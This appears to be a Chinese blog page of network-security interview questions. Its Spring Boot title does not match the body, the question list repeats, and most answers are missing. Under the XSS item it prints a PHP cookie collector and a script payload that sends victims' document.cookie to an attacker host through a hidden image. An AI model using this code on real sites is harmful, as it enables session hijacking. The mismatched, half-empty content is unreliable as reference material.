0
点赞
收藏
分享

微信扫一扫

springboot同时接收json数据和 MultipartFile

夏天的枫_ 2024-03-15 阅读 8

目录

1.对称加密和非对称加密

2.什么是同源策略?

3.cookie 存在哪里?可以打开吗?

4.xss 如何盗取 cookie?

5.xss 有 cookie 一定可以无用户名密码登录吗?

6.xss 如何防御?

7.SYN 攻击原理

8.什么是网络钓鱼?

9.DDOS

11.Web 服务器被入侵后,怎样进行排查?

12.dll 文件是什么意思,有什么用?

13.DLL 劫持原理

14.如何防止 DLL 劫持

15.Https 的作用

16.HTTPS 和 HTTP 的区别:

在面试时,网络安全也会被经常问到,至少要知道常见的攻击,以及防 御措施。在这里 Mark 下,不做深入分析。

1.对称加密和非对称加密

2.什么是同源策略?

3.cookie 存在哪里?可以打开吗?

4.xss 如何盗取 cookie?

攻击者代码:



<?php


$cookie=$_GET['cookie'];


$time=date('Y-m-d g:i:s');


$referer=getenv('HTTP_REFERER');


$cookietxt=fopen('cookie.txt','a');


fwrite($cookietxt,"time:".$time." cookie:".$cookie."

referer:".$referer.""); 注意双引号,容易出错


fclose($cookietxt);


?>

脚本端:

<script>

document.write('<img

src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0

border=0 />');


</script>

5.xss 有 cookie 一定可以无用户名密码登录吗?

6.xss 如何防御?

7.SYN 攻击原理

8.什么是网络钓鱼?

9.DDOS

10.什么是 CC 攻击?

11.Web 服务器被入侵后,怎样进行排查?

12.dll 文件是什么意思,有什么用?

13.DLL 劫持原理

14.如何防止 DLL 劫持

15.Https 的作用

16.HTTPS HTTP 的区别:

举报

相关推荐

0 条评论